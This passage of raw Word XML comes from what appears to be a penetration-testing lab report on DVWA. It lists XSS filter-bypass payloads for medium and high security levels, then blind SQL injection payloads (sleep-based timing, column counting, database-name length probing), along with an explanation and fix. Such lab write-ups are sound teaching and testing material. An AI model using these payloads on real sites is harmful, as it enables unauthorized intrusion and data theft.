                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5124450" cy="1088390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DAC0A" w14:textId="77777777" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  - Medium Security Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DEA01" w14:textId="6198C074" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 1: Injecting a simple alert script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by changing to uppercase</w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6F132" w14:textId="572C7B64" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">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512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;SCRIPT&gt;alert("hacked")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFD3EB" w14:textId="580B9903" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78388FBD" w14:textId="049DB2A2" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="000C4750" w:rsidP="00512713">
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9A0747" wp14:editId="1C162508">
            <wp:extent cx="5058481" cy="1047896"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="53968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85214" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5058481" cy="1047896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000C4750">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F95C4A" w14:textId="6298A9C7" w:rsidR="000C4750" w:rsidRDefault="000C4750" w:rsidP="000C4750">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3176716E" wp14:editId="27EA4CFF">
            <wp:extent cx="4344006" cy="666843"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31915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59278" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4344006" cy="666843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1831C686" w14:textId="4B175A8B" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t>- Step 2: Attempting to bypass script filters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899C896" w14:textId="3C1BFF80" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">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512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;scr&lt;script&gt;ipt&gt;alert("hacked")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DE8724" w14:textId="77777777" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112E87C" w14:textId="61392145" w:rsidR="00512713" w:rsidRDefault="000C4750" w:rsidP="00512713">
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FECDE9E" wp14:editId="0D24FE90">
            <wp:extent cx="5077534" cy="1019317"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="3835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187" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5077534" cy="1019317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="719470C2" w14:textId="77777777" w:rsidR="000C4750" w:rsidRDefault="000C4750" w:rsidP="000C4750">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0174C3" wp14:editId="51E902D4">
            <wp:extent cx="4344006" cy="666843"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191829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95452" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4344006" cy="666843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B59792" w14:textId="06BAD462" w:rsidR="00512713" w:rsidRPr="00693385" w:rsidRDefault="00512713" w:rsidP="00693385">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>High-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD97474" w14:textId="48725BD6" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step </w:t>
      </w:r>
      <w:r w:rsidR="00693385">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">: Using HTML5 draggable attribute to execute </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335572DD" w14:textId="0C826882" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">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512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> txtname=&lt;a draggable="true" ondragenter="alert(1)" style=display:block&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70245156" w14:textId="5D076630" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Hlk163742608"/>
      <w:r w:rsidRPr="0034765E">
        <w:t>Screenshot:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5C7BD5AE" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00512713"/>
    <w:p w14:paraId="1724741B" w14:textId="64E5BC76" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693385">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B67C0A" wp14:editId="64EFF70E">
            <wp:extent cx="5905500" cy="610235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129513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32397" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect l="641" r="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5905500" cy="610235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4ADEF" w14:textId="2E08EDA1" w:rsidR="00512713" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00693385">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27910B3D" wp14:editId="0268DD29">
            <wp:extent cx="4363059" cy="809738"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="210903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2026" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4363059" cy="809738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72A7A4" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC4FB73" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00A415E5"/>
    <w:p w14:paraId="0BEF6224" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D266658" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78426C4E" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094E81C3" w14:textId="77777777" w:rsidR="00724F44" w:rsidRPr="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B0BD9" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092272A8" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>: Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621290E" w14:textId="77777777" w:rsidR="0023763A" w:rsidRDefault="00724F44" w:rsidP="0023763A">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA (Damn Vulnerable Web Application) running at </w:t>
      </w:r>
      <w:r w:rsidR="0023763A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF3652" w14:textId="5C6B33FA" w:rsidR="00FB6EDE" w:rsidRDefault="00FB6EDE" w:rsidP="00FB6EDE">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r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> This vulnerability enables attackers to change SQL queries that the web application runs </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> get private data from the database on the back end.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6EDE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> To stop direct user input from being combined into SQL queries, developers should utilize parameterized queries or stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E8B70" w14:textId="4AD9B4E1" w:rsidR="00724F44" w:rsidRPr="00FB6EDE" w:rsidRDefault="00724F44" w:rsidP="00FB6EDE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bar w:val="none" w:sz="0" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731406C" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00724F44" w:rsidP="00693385">
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Proof of Concept Code Here:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00693385" w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06295ADA" w14:textId="55B47675" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4AAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Low Security Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F04C1" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    - Step 1: Injecting a payload to cause a delay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B65CB8" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">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693385">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      1' and sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470FDB61" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C12D8" w14:textId="2F972554" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00BD3893" w:rsidP="00693385">
      <w:r w:rsidRPr="00BD3893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547FE5A0" wp14:editId="6B16DB05">
            <wp:extent cx="5943600" cy="4016375"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="187197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70786" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4016375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FFE97" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 2: Determining the number of columns in the query result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6C556" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">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693385">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      1' order by 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD7651" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9F29C" w14:textId="64CB0F0C" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00BD3893" w:rsidP="00BD3893">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0D2110" wp14:editId="5BBA5D9E">
            <wp:extent cx="2410161" cy="581106"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="69046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64252" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2410161" cy="581106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870E7DA" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 3: Determining the length of the database name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B7BA6" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">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693385">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      1' and length(database())=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524366E5" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271E384" w14:textId="7011C87E" w:rsidR="00693385" w:rsidRDefault="00BD3893" w:rsidP="00BD3893">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75458B79" wp14:editId="08048AFC">
            <wp:extent cx="2505425" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="119153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34014" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2505425" cy="619211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599D46D" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF45FD" w14:textId="377550AD" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4AAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium and </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>High-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4AAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD0334" w14:textId="2AA4DE8E" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    - Step 1: Injecting a payload to cause a delay</w:t>
      </w:r>
      <w:r w:rsidR="00BD3893">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BD3893">
        <w:t>burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30CB51" w14:textId="77777777" w:rsidR="00693385" w:rsidRPr="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693385">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      1 and sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4ABC8" w14:textId="77777777" w:rsidR="00693385" w:rsidRDefault="00693385" w:rsidP="00693385">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk163743765"/>
      <w:r w:rsidRPr="0034765E">
